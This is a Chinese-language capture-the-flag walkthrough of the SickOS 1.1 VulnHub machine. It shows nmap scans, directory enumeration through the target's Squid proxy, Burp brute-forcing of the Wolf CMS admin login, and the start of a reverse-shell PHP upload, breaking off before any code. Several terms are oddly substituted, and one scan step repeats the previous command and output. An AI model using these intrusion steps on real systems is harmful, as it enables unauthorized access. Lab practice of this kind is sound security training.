打靶记录 SickOS 1.1

https://www.vulnhub.com/entry/sickos-11,132/

主机发现端口扫描

• 探测存活主机，136是靶机，因为靶机是我最后添加的
  1. nmap -sP 192.168.75.0/24
  2. //
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:36 CST
  4. Nmap scan report for 192.168.75.1
  5. Host is up (0.00038s latency).
  6. MAC Address: 00:50:56:C0:00:08 (VMware)
  7. Nmap scan report for 192.168.75.2
  8. Host is up (0.00031s latency).
  9. MAC Address: 00:50:56:FB:CA:45 (VMware)
  10. Nmap scan report for 192.168.75.136
  11. Host is up (0.00049s latency).
  12. MAC Address: 00:0C:29:62:FB:04 (VMware)
  13. Nmap scan report for 192.168.75.254
  14. Host is up (0.00027s latency).
  15. MAC Address: 00:50:56:F8:B3:1A (VMware)
  16. Nmap scan report for 192.168.75.131
  17. Host is up.

  复制代码
• 扫描靶机全部开放端口
  1. nmap -sT -min-rate 10000 -p- 192.168.75.136
  2. //
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
  4. Nmap scan report for 192.168.75.136
  5. Host is up (0.00075s latency).
  6. Not shown: 65532 filtered tcp ports (no-response)
  7. PORT     STATE  SERVICE
  8. 22/tcp   open   ssh
  9. 3128/tcp open   squid-http
  10. 8080/tcp closed http-proxy
  11. MAC Address: 00:0C:29:62:FB:04 (VMware)

  复制代码
• 查看服务版本以及系统版本
  1. nmap -sT -min-rate 10000 -p- 192.168.75.136
  2. //
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:41 CST
  4. Nmap scan report for 192.168.75.136
  5. Host is up (0.00075s latency).
  6. Not shown: 65532 filtered tcp ports (no-response)
  7. PORT     STATE  SERVICE
  8. 22/tcp   open   ssh
  9. 3128/tcp open   squid-http
  10. 8080/tcp closed http-proxy
  11. MAC Address: 00:0C:29:62:FB:04 (VMware)

  复制代码
• 使用脚本扫描漏洞
  1. nmap -script=vuln -p 22,3128,8080 192.168.75.136 -oA Desktop/test/vuln
  2. //
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 11:46 CST
  4. Nmap scan report for 192.168.75.136
  5. Host is up (0.00085s latency).
  7. PORT     STATE  SERVICE
  8. 22/tcp   open   ssh
  9. 3128/tcp open   squid-http
  10. 8080/tcp closed http-proxy
  11. MAC Address: 00:0C:29:62:FB:04 (VMware)

  复制代码

web渗透

• 只有8080是关闭的，打开的只有3128 端口运行着squid署理服务和ssh，访问3128 ，返回
  1. ERROR
  2. The requested URL could not be retrieved
  3. The following error was encountered while trying to retrieve the URL: /
  4.     Invalid URL
  5. Some aspect of the requested URL is incorrect.
  6. Some possible problems are:
  7.     Missing or incorrect access protocol (should be "http://" or similar)
  8.     Missing hostname
  9.     Illegal double-escape in the URL-Path
  10.     Illegal character in hostname; underscores are not allowed.
  11. Your cache administrator is webmaster.
  12. Generated Sun, 22 Sep 2024 06:03:35 GMT by localhost (squid/3.1.19)

  复制代码
  可知版本是3.1.19 ，因为他是个署理服务器，所以大概会署理着什么，大概就是80端口
  
• 因为我的火狐毗连着的是burp的署理地点，如果想要再通过署理访问别的网站并且能抓包的话，就需要设置burp上游署理服务器
  大概在：network->connection->upstreamserver 把署理地点192.168.75.136:3128 添加上去即可
  
• 访问192.168.75.136 ，页面有回显了，那就表示80在192.168.75.136:3128 下署理着
  1. # 内容
  2. BLEHHH!!!

  复制代码
  是个网路用词
  
• 扫描目录，需要指定署理服务器
  1. python .\dirsearch.py -u http://192.168.75.136 --proxy 192.168.75.136:3128
  2. //
  3. [12:15:18] 403 -  243B  - /cgi-bin/
  4. [12:15:19] 200 -  109B  - /connect
  5. [12:15:20] 403 -  239B  - /doc/
  6. [12:15:20] 403 -  242B  - /doc/api/
  7. [12:15:20] 403 -  247B  - /doc/html/index.html
  8. [12:15:20] 403 -  249B  - /doc/en/changes.html
  9. [12:15:20] 403 -  247B  - /doc/stable.version
  10. [12:15:29] 200 -   58B  - /robots.txt
  11. [12:15:30] 403 -  242B  - /server-status
  12. [12:15:30] 403 -  242B  - /server-status/

  复制代码
  发现robots.txt以及connect
  
  
  
  • connect内容
    1. #!/usr/bin/python
    3. print "I Try to connect things very frequently\n"
    4. print "You may want to try my services"

    复制代码
  • robots.txt 内容
    1. User-agent: *
    2. Disallow: /
    3. Dissalow: /wolfcms

    复制代码
    给我们提示wolfcms
    
  
  
• 访问/wolfcms ，是一个内容管理cms，爆破目录
  1. python .\dirsearch.py -u http://192.168.75.136/wolfcms --proxy 192.168.75.136:3128
  2. //
  3. [12:18:17] 200 -  403B  - /wolfcms/composer.json
  4. ....
  5. [12:18:17] 200 -    4KB - /wolfcms/CONTRIBUTING.md
  6. [12:18:18] 301 -  253B  - /wolfcms/docs  ->  http://192.168.75.136/wolfcms/docs/
  7. [12:18:18] 200 -  512B  - /wolfcms/docs/
  8. [12:18:18] 200 -    2KB - /wolfcms/docs/updating.txt
  9. [12:18:19] 200 -  894B  - /wolfcms/favicon.ico
  10. [12:18:26] 301 -  257B  - /wolfcms/public  ->  http://192.168.75.136/wolfcms/public/
  11. [12:18:26] 200 -  462B  - /wolfcms/public/
  12. [12:18:26] 200 -    2KB - /wolfcms/README.md
  13. [12:18:27] 200 -   20B  - /wolfcms/robots.txt

  复制代码
  发现robots.txt以及readme.md
  访问后robots.txt 是空的，readme.md 为设置阐明
  
• 通过查阅得知后台登岸地点在/wolfcms/?/admin/login
  
  
  
  网路搜刮默认账号暗码尝试，登岸失败
  使用burp进行爆破，指定账号为admin ，通过暗码字典爆破
  爆破乐成，账号暗码都是 admin
  

获得初级shell

<ul>登岸进去后探求可利用点，找到 uploadfile
在 file→Uploadfile
上传反弹shell代码文件
[code]//getshell.php